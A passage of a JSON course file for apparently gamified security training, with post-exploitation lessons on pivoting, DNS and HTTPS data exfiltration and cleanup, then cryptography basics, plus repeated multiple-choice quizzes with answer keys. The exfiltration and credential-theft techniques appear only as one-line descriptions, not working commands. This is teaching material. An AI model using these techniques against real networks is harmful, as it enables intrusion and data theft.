HTTP/WebSocket, SOCKS proxy support"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Chisel tunnels over...","opts":["SSH","HTTP/WebSocket","DNS","ICMP"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-px-pivot-ligolo","cat":"Post-Exploitation","title":"Ligolo-ng Pivoting","diff":3,"xp":200,"intro":"Modern, fast network pivoting tool.","sections":[{"type":"text","content":"Modern, fast network pivoting tool."},{"type":"code","lang":"bash","content":"Creates a virtual network interface for transparent pivoting \u2014 no proxychains needed"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Ligolo's advantage over chisel...","opts":["Slower","No proxychains needed (transparent routing)","Simpler","Older"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-px-exfil-dns","cat":"Post-Exploitation","title":"DNS Data Exfiltration","diff":3,"xp":200,"intro":"Encode and send stolen data through DNS.","sections":[{"type":"text","content":"Encode and send stolen data through DNS."},{"type":"code","lang":"bash","content":"Encode data in subdomain queries \u2014 DNS is almost never blocked"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"DNS exfil works because...","opts":["DNS is encrypted","DNS is almost never blocked by firewalls","DNS is fast","DNS uses TCP"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-px-exfil-https","cat":"Post-Exploitation","title":"HTTPS Data Exfiltration","diff":2,"xp":150,"intro":"Blend exfiltration with normal HTTPS traffic.","sections":[{"type":"text","content":"Blend exfiltration with normal HTTPS traffic."},{"type":"code","lang":"bash","content":"Upload data to cloud storage or attacker server over HTTPS \u2014 looks like normal browsing"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"HTTPS exfil is stealthy because...","opts":["It's fast","It blends with normal encrypted web traffic","It uses UDP","It's compressed"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-px-cleanup","cat":"Post-Exploitation","title":"Cleanup After Engagement","diff":1,"xp":75,"intro":"Remove artifacts and restore the environment.","sections":[{"type":"text","content":"Remove artifacts and restore the environment."},{"type":"code","lang":"bash","content":"Delete tools, remove accounts, restore configs, document changes"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Cleanup is important because...","opts":["It hides evidence","Leftover tools create real security risks","It's optional","It saves disk"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"cr-cr-symmetric","cat":"Cryptography","title":"Symmetric Encryption","diff":1,"xp":50,"intro":"Same key encrypts and decrypts.","sections":[{"type":"text","content":"Same key encrypts and decrypts."},{"type":"code","lang":"bash","content":"AES, ChaCha20, DES \u2014 both parties share one secret key"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Symmetric encryption uses...","opts":["Two keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-cr-asymmetric","cat":"Cryptography","title":"Asymmetric Encryption","diff":1,"xp":75,"intro":"Public key encrypts, private key decrypts.","sections":[{"type":"text","content":"Public key encrypts, private key decrypts."},{"type":"code","lang":"bash","content":"RSA, ECC \u2014 public key is shared, private key is secret"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Asymmetric uses...","opts":["One key","Two keys (public + private)","No keys","Three keys"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-cr-hash-functions","cat":"Cryptography","title":"Hash Functions Overview","diff":1,"xp":50,"intro":"One-way functions that produce fixed-size fingerprints.","sections":[{"type":"text","content":"One-way functions that produce fixed-size fingerprints."},{"type":"code","lang":"bash","content":"MD5 (broken), SHA-1 (deprecated), SHA-256 (standard), SHA-3 (latest)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Hash functions are...","opts":["Reversible","One-way (irreversible)","Bidirectional","Symmetric"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature 